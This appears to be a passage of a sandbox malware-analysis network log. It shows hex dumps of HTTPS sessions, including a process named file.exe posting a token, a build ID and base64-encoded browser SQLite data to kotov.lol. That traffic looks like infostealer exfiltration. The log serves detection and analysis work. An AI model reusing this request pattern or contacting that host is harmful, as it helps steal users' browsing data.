2024-11-29 11:27:59 UTC	1390	IN	Data Raw: eb 3e aa 67 36 b6 c2 7d dd cf 6f 71 6a 3c aa 40 7e 15 06 ce 18 81 87 14 8e b0 58 44 27 7a dd 77 ac b1 b7 dc 66 ab cf 89 e9 ce a6 3c ec 05 3f 02 02 d8 27 ea 46 4f 70 bb e1 2d 44 84 4e 09 f6 ed 1b e9 1b c5 3d 68 a6 0c d9 75 0f 3f b1 8e cd 35 f6 95 bf 91 bd 1a 69 d1 42 51 b5 ee b9 e2 ce 89 50 6c 26 16 de 89 5e bc e6 c4 fd 26 da f5 e3 ce 69 10 77 1e cc c8 01 e9 9e 41 6a 55 a0 38 bc ac b1 bf 6b be 7b ba 51 77 aa c0 9b 05 fc b0 44 37 6a e6 e1 c0 0e 78 4a 7b 14 13 4f eb 10 ed ee 3f fb 8d c4 1f af b9 25 7e f2 af cb 87 f0 11 f9 c7 c7 ff c1 df c8 80 4b b7 c6 3f 03 ce 51 66 ae c1 bd e9 35 31 9c a0 54 88 27 0b eb 52 98 2c 14 76 36 e7 d3 53 74 70 f3 94 48 50 51 74 c1 6a 6c c5 02 57 75 bf ea 37 d6 5c 85 75 ff 1a de 92 f6 c3 8e 3c db 2b f4 fc 0a bf 49 4b a8 ce 14 7e 00 Data Ascii: >g6}oqj<@~XD'zwf<?'FOp-DN=hu?5iBQPl&^&iwAjU8k{QwD7jxJ{O?%~K?Qf51T'R,v6StpHPQtjlWu7\u<+IK~
2024-11-29 11:27:59 UTC	1390	IN	Data Raw: 48 3f c7 20 98 a3 4a ae e7 0e 9d 1f 06 63 15 24 ff cb b8 61 7b a2 4e 58 74 c0 4c 09 86 ba 97 48 e8 03 c4 a9 0f ee 35 65 bd 60 e1 21 a1 18 44 a6 bd 68 e1 33 23 9a dc 91 a1 d2 1c 38 bf d3 98 ca 64 0f d9 ab 56 8f 6d 95 56 f8 a5 e3 ec 3d ef d5 2d b3 5c 3d e6 ff 3a fe 0d 19 c0 60 d4 b8 23 8f b9 88 da a3 ee df 88 f6 ec a7 9c 21 9f 2e 21 cc 81 f2 75 fd ed 12 f6 f3 fe 52 6a 9f db f0 a2 fb e9 a7 81 d4 f7 eb f5 58 53 9e 25 3f f7 32 7e 98 ff 3b 96 ae c7 fe 9f e7 2d df ff f0 9c e5 bf be 3b 4a 9f 4d 99 a9 ba 7f 9d 95 6c 74 8c da b7 42 c7 85 e0 d3 bd e4 8e ca 4d fb 56 f6 ea 5a f6 b6 f6 9f f3 77 e9 37 5f 85 df 9d ff fb bb 96 8e e7 01 8d 3f b9 f3 73 16 f3 d4 7e 18 a7 d6 fb f9 ff 5d c7 97 a1 e3 ee bb 84 8e a9 59 2c 05 d7 fa d6 5e e6 f7 e4 df 87 46 8b e9 f6 55 5f 7f fd e5 Data Ascii: H? Jc$a{NXtLH5e`!Dh3#8dVmV=-\=:`#!.!uRjXS%?2~;-;JMltBMVZw7_?s~]Y,^FU_
2024-11-29 11:27:59 UTC	1390	IN	Data Raw: 50 3d 5b 7f a3 9a c1 c2 43 a0 f0 9c cf 84 2c dc 6f 77 dd ff 5e 04 27 23 01 db 3b d0 22 fa fd ca c2 00 94 91 17 e4 5e bb e4 28 b3 f2 09 87 4b 75 14 8e e0 c2 6f 3a 13 0a 28 96 4a ee 0a 6a 2c 09 f3 2c c2 e9 23 6a 8c ec 09 a0 e8 96 87 84 d2 68 a5 cd ca f5 ec 0a 46 60 f9 be 7b e8 5e a6 f5 2e a5 46 6e c8 a6 db bc 01 50 4b 07 08 1d fb 12 3a a0 00 00 00 23 01 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 72 6f 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 c1 4e 1c 31 0c bd f3 15 d6 9c 8a 34 a0 65 7b 82 1b 82 55 4f 85 aa 2d 97 aa 17 6f c6 b3 58 ca 38 51 Data Ascii: P=[C,ow^'#;"^(Kuo:(Jj,,#jhF`{^.FnPK:#PK!-_locales/ro/messages.jsonUT6*g Ad/RN14e{UO-oX8Q
2024-11-29 11:27:59 UTC	1390	IN	Data Raw: ee 12 87 56 cb 68 4b 0f 6e 3d 2c 91 9f b7 f2 c2 8f 9e 81 ed 64 91 89 5f c8 93 db ec d7 38 3e f4 ec 97 19 5a 11 ad f3 b8 82 28 3a 6c b3 ee 24 e1 50 fb 79 09 cf f1 ad 57 e9 76 70 aa 85 35 32 aa 0a 0f 41 0d 1c 63 cf 15 51 0d 8c 44 97 9c 43 b8 94 04 8f 60 5f 09 e2 4b c0 6e a2 3a 29 12 e1 86 4f 49 97 b9 92 11 e2 5a d6 16 fc 60 20 03 a5 d7 f5 68 06 5f 65 93 9a dd ad 65 97 51 8b ac 05 b4 69 a5 64 30 17 f8 1c 4a 1d 10 6c a0 02 36 20 1b 29 c2 cd 6a e6 f5 e9 55 66 60 81 a8 0e 0c 0c 22 4a e0 41 05 8c 7f 9c 57 46 cf 54 ff 32 7c 7d 9b 6e 4b 1e be a1 2b 8b 2c ea 96 fa 5c 18 5d 04 b1 51 7c 89 a2 45 6d 3a 0b 61 c3 6f a2 78 04 e6 19 c0 10 c1 b2 2f e8 63 ec 0d 6c f9 20 a0 26 d6 8b ea b0 75 64 be 5d fd c4 70 d9 3b b5 ed d4 f1 bc 8d 4d 4a b4 8e 05 bc 1a 18 57 05 34 4d 40 13 Data Ascii: VhKn=,d_8>Z(:l$PyWvp52AcQDC`_Kn:)OIZ` h_eeQid0Jl6 )jUf`"JAWFT2\|}nK+,\]Q\|Em:aox/cl &ud]p;MJW4M@
2024-11-29 11:27:59 UTC	1390	IN	Data Raw: 8f 15 60 c1 98 b9 ab 80 ac 82 c5 04 63 89 63 38 bd 2a 36 1c e9 9a 44 2a 3c 4e 2d ee 92 46 8e 50 dc e3 94 bb f5 61 c2 1d cf 5c 48 24 42 49 6c 12 12 d7 49 d9 ae b5 78 32 3e ee bd 6d 14 36 10 04 42 78 75 49 e8 56 12 9a c0 f8 4e 5b 9e a8 18 48 07 60 fa c4 f3 b8 1c e9 66 42 8d 56 0a 4d 3a 20 57 32 60 3d 87 5b 12 2d 22 e5 44 56 25 e1 21 a6 58 0d e8 46 f5 04 83 06 0e 87 28 fb a4 f0 19 18 b8 02 88 01 7c 80 61 ef 0c 9c e0 24 d3 07 48 c9 09 3f e2 9c 5e e9 89 97 4b 26 3f f6 66 0d 22 cf 03 86 52 31 81 e4 3a 97 fa 54 dc fb b0 49 d9 ef a1 7d 1a 46 e5 77 f4 02 a7 fd a6 7b 35 4f fa 61 2c 0d 6e 07 7a 72 4d 94 18 5d f3 fe 4e 2c 30 9b 6d f6 54 60 d0 58 d4 81 d8 05 43 89 9b 2d 91 75 b1 84 72 e5 82 16 5a a8 d1 8f 71 28 22 a2 ed 69 03 7e 0f 3a 87 3c 26 69 4c 4d 0a 36 d7 c7 a7 Data Ascii: `cc86D<N-FPa\H$BIlIx2>m6BxuIVN[H`fBVM: W2`=[-"DV%!XF(\|a$H?^K&?f"R1:TI}Fw{5Oa,nzrM]N,0mT`XC-urZq("i~:<&iLM6
2024-11-29 11:27:59 UTC	1390	IN	Data Raw: 3f a2 77 74 f9 39 14 92 6f 30 19 61 42 16 3c c5 8e d8 b3 84 2e 10 d8 71 39 f8 5c 22 7b 60 27 ee 3a 3f 1a 26 6a f5 a8 f2 1f 13 ad 85 fc dd 51 24 58 d5 3c 25 19 9d fa 2b 81 d6 c7 4d 37 fd 9a e2 f2 53 ad 5f c1 c9 b9 41 f8 0f 77 84 84 39 d5 5c 7f 74 b0 dd bb 43 ac e6 be ce d5 bf df bb 77 82 1b a6 ff 9c 05 67 3a 77 fe 7a f2 5d 9a 09 4d 66 b5 8d f8 e6 d8 2d cb 4e 6d ee a3 82 48 7b c6 a8 5d b2 e8 52 97 3d e5 a5 b8 ef 36 ad cf 46 de f8 e7 8e 98 46 5f 0f 08 b5 d5 be 41 c5 77 eb e3 54 28 7a 31 07 87 c9 e3 1b f0 13 22 9f 73 e2 40 ce 5e e0 09 2d 54 01 dc 63 06 df 9b 0e c1 43 bf 5c bc 02 50 4b 07 08 c0 47 8a 9f 88 01 00 00 46 03 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6b 6d 2f 6d 65 73 Data Ascii: ?wt9o0aB<.q9\"{`':?&jQ$X<%+M7S_Aw9\tCwg:wz]Mf-NmH{]R=6FF_AwT(z1"s@^-TcC\PKGFPK!-_locales/km/mes
2024-11-29 11:27:59 UTC	1390	IN	Data Raw: c1 c2 b3 df 74 6f 40 46 69 27 57 e6 ee 9e df fa e6 7c 6c 22 ff dc fc cd 83 bf 84 75 53 df fb 95 fb e0 a6 5b e2 f7 c1 5f 87 cb 78 0d a9 ac a4 0c 68 8e 44 f1 68 52 0e 42 cf 48 31 70 61 e4 4c d1 69 c5 a7 46 2f 04 a6 71 7a 9a be 86 7e 9a df 4a 91 d1 b6 e2 f0 34 96 a4 11 21 a4 4d e9 67 b4 5d b3 aa 52 cd 51 3d 41 bb 66 f2 ab fd 2b c2 fc 18 cf 78 47 7c 50 e9 5f 0e f0 9b c4 43 6a 2a f2 42 35 42 84 04 d7 70 02 ab 0d b5 b1 89 32 98 e2 55 e6 4f d6 3f 1c 81 d7 4f df 01 50 4b 07 08 80 81 20 9b 32 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 6b 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 Data Ascii: to@Fi'W\|l"uS[_xhDhRBH1paLiF/qz~J4!Mg]RQ=Af+xG\|P_CjB5Bp2UO?OPK 2PK!-_locales/sk/messages.jsonUT6g Ad/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.8	49755	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:27:58 UTC	319	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJDAECAEBKJJJKEBKKJD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 207993 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:27:58 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 Data Ascii: ------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------KJDAECAEBKJJJKEBKKJDCont
2024-11-29 11:27:58 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:27:58 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:27:58 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:27:58 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:27:58 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:27:58 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:27:58 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:27:58 UTC	16355	OUT	Data Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
2024-11-29 11:27:58 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:01 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.8	49764	162.159.61.3	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:00 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-29 11:28:00 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-29 11:28:00 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 29 Nov 2024 11:28:00 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8ea240735e2b8cab-EWR alt-svc: h3=":443"; ma=86400
2024-11-29 11:28:00 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1b 00 04 8e fa 50 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomP)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
